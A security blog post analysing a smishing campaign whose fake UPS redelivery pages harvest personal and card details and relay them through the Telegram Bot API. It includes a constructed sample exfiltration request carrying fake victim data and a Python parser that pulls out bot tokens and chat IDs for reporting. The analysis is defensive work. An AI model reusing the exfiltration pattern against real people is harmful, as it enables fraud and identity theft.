Analysis of a Smishing Text

Aaron Stratton, published in InfoSec Write-ups, Nov 13, 2022 (5 min read)

Introduction

This blog post is a bit different from most of the content I post here, but I think it will interest people because it is a relatable story. Just about anybody with a cell phone has at some point received sketchy text messages about package delivery delays, credit card payments, and so on. In short, I recently received a smishing (phishing over SMS) message and dug into it to see what I could uncover. Smishing is defined by the Oxford Dictionary as “the fraudulent practice of sending text messages purporting to be from reputable companies in order to induce individuals to reveal personal information, such as passwords or credit card numbers.” During my analysis of this smishing attempt I learned a few interesting things and had some fun with it. This post walks through the steps I took and explains the findings along the way. Enjoy!

Analysis

Figure 1. Smishing message containing link to apparent LinkedIn content.

So this all started with a text message from a strange number. Even a quick glance raised a few red flags. 1) The strange number. I have seen legitimate messages come from odd-looking numbers like this one, but in my experience the majority of unsolicited messages from such numbers are malicious. 2) The message references a UPS package that cannot be delivered and needs to be scheduled for redelivery, yet the link apparently points to LinkedIn. A carrier notification has no reason to send you to a social network. 3) Phishing and smishing lures built around package deliveries are extremely common. Almost everybody has a package or two en route on any given day, so hearing that one of them needs to be rescheduled introduces relevance and urgency, since most people want their packages as soon as possible. These three things made me 100% confident that this was a smishing attempt, but what’s the fun in stopping there?

I spun up my Kali Linux VM and started Burp Suite so that I could intercept, view, and modify the HTTP requests to the malicious site. Then I navigated to the link from the text message and was immediately redirected to this fake UPS page asking for my zip code. The LinkedIn-looking link is most likely just a redirect hop through a legitimate service, there to make the URL look trustworthy in the message preview while the real destination lives elsewhere.

Figure 2. Note the strange URL.

From here, I looked up the IP address of this site on VirusTotal and IPVoid, and both indicated that the address had been associated with phishing and smishing for approximately 8 months before this post was written (November 2022). [1] The IP associated with this fake UPS website is part of a Fastly Content Delivery Network (CDN). Using a CDN to mask the true origin is a TTP commonly used in phishing and smishing campaigns. It also makes the sites slightly harder to block, because blocking a CDN IP would also block the legitimate websites served from the same address. Blocking therefore has to happen at the domain level (DNS name, HTTP Host header, or TLS SNI) rather than the IP, and the problem with that is that moving the malicious content to a new domain name is cheap and easy for an attacker. Such is the cat-and-mouse game of cybercrime and cybersecurity.

After entering a fake zip code, I was brought to another page indicating that my fictitious package was “On Hold”, with the option to schedule a redelivery.

Figure 3. Page indicating that a package is “On Hold”, and giving the victim the option to schedule a redelivery.

Once I clicked on the button to schedule a redelivery, I was taken to a page where I could enter information such as name, date of birth, street address, city, state, phone number, and email address.

Figure 4. Form for scheduling “redelivery”

After entering all of that information, I was taken to a page where I could enter credit card information to pay for the redelivery. I entered some fake card details and intercepted the HTTP GET request that carried them. This GET request sent everything I had entered in the previous forms to the Telegram Bot API, which relayed it to a specific Telegram group where the cybercriminal(s) sit and wait for victim information to flow in. Two things are worth noting about this exfiltration channel. First, it blends in: the request goes to a legitimate, widely used service over HTTPS, so it does not stand out the way a call to a freshly registered attacker domain would. Second, a Bot API call of this kind necessarily carries the kit’s bot token in the URL path and the destination chat ID in the query string, so the intercepted request hands the analyst two durable indicators for pivoting on other samples of the same kit and for reporting the bot to Telegram.

Figure 5. Victim information being sent to attacker-controlled Telegram group
Figure 6. Formatted victim information. This is how the information would appear to the cybercriminals in the Telegram group
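As an added example (not code from the original post or from the phishing kit), here is a small Python parser that pulls those indicators out of such a request. SAMPLE_REQUEST is a constructed stand-in for what Burp Suite would show, with a made-up bot token, chat ID and victim data; the `/bot<token>/sendMessage?chat_id=...&text=...` shape is the documented Telegram Bot API form, but the exact “Field: value” layout the kit used for the stolen form is an assumption.

```python
"""Pull indicators out of a phishing kit's Telegram exfiltration request.

Added example for this post, not code from the original article or from the
phishing kit. SAMPLE_REQUEST is a constructed stand-in for what Burp Suite
would show: a GET to the Telegram Bot API's sendMessage endpoint. The bot
token, chat_id and victim fields are made up.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample request (hypothetical token, chat id and victim data).
SAMPLE_REQUEST = (
    "GET /bot1234567890:AAFakeTokenForIllustrationOnly_xxxxxxxxxxx/sendMessage"
    "?chat_id=-1001234567890"
    "&text=UPS+Redelivery%0AName%3A+John+Doe%0ADOB%3A+01%2F02%2F1980"
    "%0AAddress%3A+123+Main+St%0ACity%3A+Springfield%0AState%3A+IL"
    "%0APhone%3A+5551234567%0AEmail%3A+john%40example.com"
    "%0ACard%3A+4111111111111111%0AExp%3A+12%2F25%0ACVV%3A+123"
    "&parse_mode=HTML HTTP/1.1\r\n"
    "Host: api.telegram.org\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)

# Bot API paths look like /bot<bot_id>:<secret>/<method>; the numeric prefix
# of the token is the bot's own Telegram user id.
BOT_PATH_RE = re.compile(
    r"^/bot(?P<token>(?P<bot_id>\d+):[A-Za-z0-9_-]{20,})/(?P<method>[A-Za-z]+)$"
)
TELEGRAM_API_HOSTS = {"api.telegram.org"}
SEND_METHODS = {"sendMessage", "sendDocument", "sendPhoto"}


def mask_pan(pan: str) -> str:
    """Keep the first 6 and last 4 digits of a card number; never log it whole."""
    digits = re.sub(r"\D", "", pan)
    if len(digits) < 12:
        return "*" * len(digits)
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def chat_type(chat_id: str) -> str:
    """Telegram ids: -100... is a supergroup/channel, other negatives a group."""
    if chat_id.startswith("-100"):
        return "supergroup/channel"
    if chat_id.startswith("-"):
        return "group"
    return "private"


def parse_exfil_request(raw: str) -> dict:
    """Parse a raw HTTP request and extract Telegram exfiltration indicators."""
    request_line, _, rest = raw.partition("\r\n")
    http_method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in rest.split("\r\n"):
        if not line:  # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()

    url = urlsplit(target)
    match = BOT_PATH_RE.match(url.path)
    if match is None:
        return {"host": headers.get("host"), "telegram_bot_call": False}

    params = parse_qs(url.query)
    text = params.get("text", [""])[0]

    # Assumed kit layout: the stolen form is sent as "Field: value" lines.
    victim = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if not sep:
            continue  # title line or free text, not a field
        key, value = key.strip(), value.strip()
        if "card" in key.lower():
            value = mask_pan(value)
        victim[key] = value

    chat_id = params.get("chat_id", [""])[0]
    return {
        "host": headers.get("host"),
        "http_method": http_method,
        "telegram_bot_call": True,
        "api_method": match.group("method"),
        "bot_token": match.group("token"),
        "bot_id": match.group("bot_id"),
        "chat_id": chat_id,
        "chat_type": chat_type(chat_id) if chat_id else "unknown",
        "victim": victim,
    }


def is_telegram_exfil(parsed: dict) -> bool:
    """True when the request is a send* call to the real Bot API host."""
    return (
        parsed.get("telegram_bot_call", False)
        and parsed.get("host") in TELEGRAM_API_HOSTS
        and parsed.get("api_method") in SEND_METHODS
    )


if __name__ == "__main__":
    result = parse_exfil_request(SAMPLE_REQUEST)
    print("telegram exfil:", is_telegram_exfil(result))
    for key in ("bot_id", "chat_id", "chat_type", "api_method"):
        print(f"{key}: {result[key]}")
    for field, value in result["victim"].items():
        print(f"  {field}: {value}")
```

The token’s numeric prefix is the bot’s own Telegram user ID, and a chat_id beginning with -100 identifies a supergroup or channel, which matches the group the post describes. Those two values plus the full token are what you would hand to Telegram’s abuse contact or use to pivot on other samples of the same kit; the card number is masked before it can land in any report or ticket.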

Conclusion

I had fun with this and I hope you enjoyed reading this post, and maybe even learned something. Like most people, I get similar phishing/smishing messages once in a while, but usually by the time I can analyze them the associated infrastructure has been taken down. Luckily for me, that was not the case with this one, though I hope not many people were victimized by this scam. If you enjoyed this post, please come back again! A follow and share would be super appreciated, and feedback is welcome as well.

References

[1] https://www.virustotal.com/gui/ip-address/199.36.158.100/community
